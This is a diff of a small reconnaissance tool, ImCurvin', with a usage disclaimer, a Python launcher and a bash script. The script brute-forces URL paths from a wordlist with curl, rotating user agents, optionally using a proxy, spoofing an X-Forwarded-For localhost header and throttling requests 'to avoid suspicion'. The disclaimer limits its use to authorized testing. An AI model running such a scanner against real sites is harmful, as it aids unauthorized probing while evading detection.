38
|
+
|
|
39
|
+
http://www.apache.org/licenses/LICENSE-2.0
|
|
40
|
+
->>
|
|
@@ -0,0 +1,38 @@
|
|
|
1
|
+
READ THIS BEFORE USE IMCURVIN'
|
|
2
|
+
|
|
3
|
+
1. TERMS OF OPERATION
|
|
4
|
+
The User is strictly authorized to execute this tool ONLY against
|
|
5
|
+
domains, networks, or infrastructures that meet the following criteria:
|
|
6
|
+
|
|
7
|
+
a. The infrastructure is entirely owned and operated by the User,
|
|
8
|
+
intended solely for personal security testing and evaluation.
|
|
9
|
+
b. The User has obtained explicit, written, and legally binding
|
|
10
|
+
authorization from the target infrastructure owners.
|
|
11
|
+
|
|
12
|
+
2. LIABILITY DISCLAIMER
|
|
13
|
+
Performing security audits or scanning unauthorized targets is strictly
|
|
14
|
+
illegal and constitutes a violation of cyber security regulations.
|
|
15
|
+
|
|
16
|
+
The developer of ImCurvin' assumes absolutely no liability and is not
|
|
17
|
+
responsible for any misuse, data disruption, legal consequences, or
|
|
18
|
+
damages caused by the User's unauthorized or malicious actions.
|
|
19
|
+
|
|
20
|
+
3. ETHICAL ENGAGEMENT
|
|
21
|
+
Users are expected to demonstrate professionalism and integrity.
|
|
22
|
+
Always verify that your target environment is properly whitelisted
|
|
23
|
+
and scoped before initiating any execution sequence.
|
|
24
|
+
|
|
25
|
+
Always be a good person and choose your target wisely. Do not cause
|
|
26
|
+
trouble if you do not want trouble caused to you.
|
|
27
|
+
|
|
28
|
+
->>
|
|
29
|
+
|
|
30
|
+
Copyright 2026 Skokoo.
|
|
31
|
+
|
|
32
|
+
Licensed under the Apache License, Version 2.0 (the "LICENSE");
|
|
33
|
+
you may not use this file except in compliance with the License.
|
|
34
|
+
You may obtain a copy of the License at
|
|
35
|
+
|
|
36
|
+
http://apache.org
|
|
37
|
+
|
|
38
|
+
->>
|
|
File without changes
|
|
@@ -0,0 +1,21 @@
|
|
|
1
|
+
import os
|
|
2
|
+
import subprocess
|
|
3
|
+
import sys
|
|
4
|
+
|
|
5
|
+
def main():
|
|
6
|
+
current_dir = os.path.dirname(os.path.abspath(__file__))
|
|
7
|
+
script_path = os.path.join(current_dir, 'imcurvin.sh')
|
|
8
|
+
if not os.path.exists(script_path):
|
|
9
|
+
parent_dir = os.path.dirname(current_dir)
|
|
10
|
+
script_path = os.path.join(parent_dir, 'Imcurvin', 'imcurvin.sh')
|
|
11
|
+
if os.path.exists(script_path):
|
|
12
|
+
try:
|
|
13
|
+
os.chmod(script_path, 0o755)
|
|
14
|
+
except Exception:
|
|
15
|
+
pass
|
|
16
|
+
try:
|
|
17
|
+
subprocess.run(['bash', script_path] + sys.argv[1:], check=True)
|
|
18
|
+
except subprocess.CalledProcessError as e:
|
|
19
|
+
sys.exit(e.returncode)
|
|
20
|
+
except KeyboardInterrupt:
|
|
21
|
+
sys.exit(130)
|
|
@@ -0,0 +1,52 @@
|
|
|
1
|
+
# ImCurvin' v1.2.0
|
|
2
|
+
# Copyright 2026 Skokoo
|
|
3
|
+
# Licensed under the Apache License, Version 2.0
|
|
4
|
+
# Code version 3.2
|
|
5
|
+
|
|
6
|
+
# I just googled germany food. ah yes, germany food...
|
|
7
|
+
if [ -n "$custom_wordlist" ]; then
|
|
8
|
+
if [ ! -f "$custom_wordlist" ]; then
|
|
9
|
+
echo "[!] Custom Wordlist not found."
|
|
10
|
+
exit 1
|
|
11
|
+
fi
|
|
12
|
+
sauerkraut="$custom_wordlist"
|
|
13
|
+
else
|
|
14
|
+
sauerkraut="$(dirname "$0")/../data/target_default.txt"
|
|
15
|
+
fi
|
|
16
|
+
#dir = dear right? Dear name?
|
|
17
|
+
schnitzel=0
|
|
18
|
+
# i hate creating more files, so array.
|
|
19
|
+
pretzel=(
|
|
20
|
+
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
|
|
21
|
+
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
|
|
22
|
+
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0"
|
|
23
|
+
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15"
|
|
24
|
+
"Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Mobile Safari/537.36"
|
|
25
|
+
"Mozilla/5.0 (iPhone; CPU iPhone OS 17_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Mobile/15E148 Safari/605.1.15"
|
|
26
|
+
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
|
|
27
|
+
)
|
|
28
|
+
echo -e "\e[0;34m[\e[0m+\e[0;34m]\e[0m Starting standard scanning..\n"
|
|
29
|
+
# loop, loop. If loop = loop do loop. If loop ≠ loop dont loop ok?
|
|
30
|
+
while IFS= read -r kartoffelsalat || [ -n "$kartoffelsalat" ]; do
|
|
31
|
+
[[ -z "$kartoffelsalat" || "$kartoffelsalat" =~ ^# ]] && continue
|
|
32
|
+
#sike
|
|
33
|
+
spatzle="$target_url/$kartoffelsalat"
|
|
34
|
+
strudel=${pretzel[$RANDOM % ${#pretzel[@]}]}
|
|
35
|
+
|
|
36
|
+
echo -e "\e[0;34m[\e[0m+\e[0;34m]\e[0m Scanning $spatzle"
|
|
37
|
+
proxy_flag=""
|
|
38
|
+
if [ -n "$custom_proxy" ]; then
|
|
39
|
+
proxy_flag="-x $custom_proxy"
|
|
40
|
+
fi
|
|
41
|
+
curl $proxy_flag -m 3 -A "$strudel" -H "X-Forwarded-For: 127.0.0.1" -Iv "$spatzle" --stderr - | grep "< HTTP"
|
|
42
|
+
|
|
43
|
+
schnitzel=$((schnitzel + 1))
|
|
44
|
+
|
|
45
|
+
if [ $((schnitzel % 5)) -eq 0 ]; then
|
|
46
|
+
echo -e "\e[0;33m[\e[0m?\e[0;33m]\e[0m Sleep for 5 seconds, to avoid suspicion"
|
|
47
|
+
sleep 5
|
|
48
|
+
else
|
|
49
|
+
sleep $((1 + RANDOM % 3)) #sleep. Bruh is this commentar even- ah.
|
|
50
|
+
fi
|
|
51
|
+
|
|
52
|
+
done < <(shuf "$sauerkraut")
|